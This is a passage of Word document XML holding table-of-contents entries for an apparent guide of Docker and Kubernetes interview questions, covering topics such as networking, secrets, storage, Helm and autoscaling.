            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FE7A4BB" w14:textId="42C8743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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9. What is the difference between docker network bridge, host, and none?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170</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04A77EA4" w14:textId="7B72ECD7"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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10. What is a multi-stage build in Docker, and why is it useful?</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170</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28B211DA" w14:textId="3F4F1CA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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>11. How do you manage secrets in Docker?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170</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52639B7B" w14:textId="3089B22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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>12. How do you implement Docker in a CI/CD pipeline?</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170</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52509BDE" w14:textId="6EC357F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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>13. What is the role of Docker Swarm? How does it differ from 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171</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="797879D9" w14:textId="53B8131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79" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>14. Explain how you would secure a Docker container.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_Toc178383379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171</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DE770BF" w14:textId="7546846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80" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>15. How do you manage storage in Docker?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171</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52DD0D0D" w14:textId="58A4C2B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81" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>16. What is a Docker Registry, and how do you use it?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171</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="054A985F" w14:textId="0884BB4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82" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>17. What is Docker Overlay Network, and when would you use it?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172</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19C43687" w14:textId="3E6EE87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83" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>18. How does Docker handle logging?</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172</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="176C8D7F" w14:textId="42DC45D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84" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19. What is Docker Hub, and what are some best practices for using it?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172</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A7CFA4F" w14:textId="3FA0555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85" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>20. What is the difference between Docker Image and Docker Container?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172</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="679B72E0" w14:textId="6E96A665" w:rsidR="00593FEF" w:rsidRPr="00DA2F32" w:rsidRDefault="00000000" w:rsidP="009E0607">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10314"/>
            </w:tabs>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
              <w:noProof/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc178383386" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5192F4D5" w14:textId="20B9FDE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87" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1. What is Kubernetes, and what are its main components?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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DC77A15" w14:textId="0A809F09"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88" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2. What is a Pod in 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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38A31DEB" w14:textId="06DE21FC"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89" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3. What is a ReplicaSet in Kubernetes, and how is it different from a ReplicationController?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_Toc178383389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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64BF933D" w14:textId="2DF5E60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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4. What is a Deployment in Kubernetes, and how do you use it?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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24808751" w14:textId="6E3F7C8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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5. Explain the difference between a Service and an Ingress in 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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71D40770" w14:textId="56ACFD2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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6. What are ConfigMaps and Secrets in Kubernetes? How are they different?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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E2E4BCC" w14:textId="18688A5D"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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7. What is a StatefulSet, and when would you use it?</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173</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="011EB18C" w14:textId="64B1193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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8. What is a DaemonSet in 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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="118DF2A6" w14:textId="499F5F6B"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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9. How do you perform rolling updates and rollbacks in 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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DA272EC" w14:textId="778D6F02"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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10. What is the role of etcd in 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_Toc178383396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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C1F7195" w14:textId="4C8A334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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>12. What is the purpose of the kube-proxy?</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_Toc178383397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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D5538E8" w14:textId="21C1A2E0"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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>13. What are Kubernetes namespaces, and why are they used?</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_Toc178383398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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59750152" w14:textId="6448D8E6"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399" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>14. Explain the Horizontal Pod Autoscaler (HPA).</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_Toc178383399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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78C091A2" w14:textId="065D1D2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400" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>15. How do you manage persistent storage in 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_Toc178383400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174</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E9FF4CE" w14:textId="17855A9F"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401" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>16. What are taints and tolerations in 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_Toc178383401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175</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="297F4D8B" w14:textId="63BB5A74"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402" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>17. What is a Kubernetes Operator?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_Toc178383402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175</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13CE84A5" w14:textId="40A1D861"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403" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>18. Explain Kubernetes secrets and how they are managed.</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_Toc178383403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175</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74C37BCA" w14:textId="3E02EB15"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404" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>19. What is Helm, and how is it used in Kubernetes?</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_Toc178383404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175</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
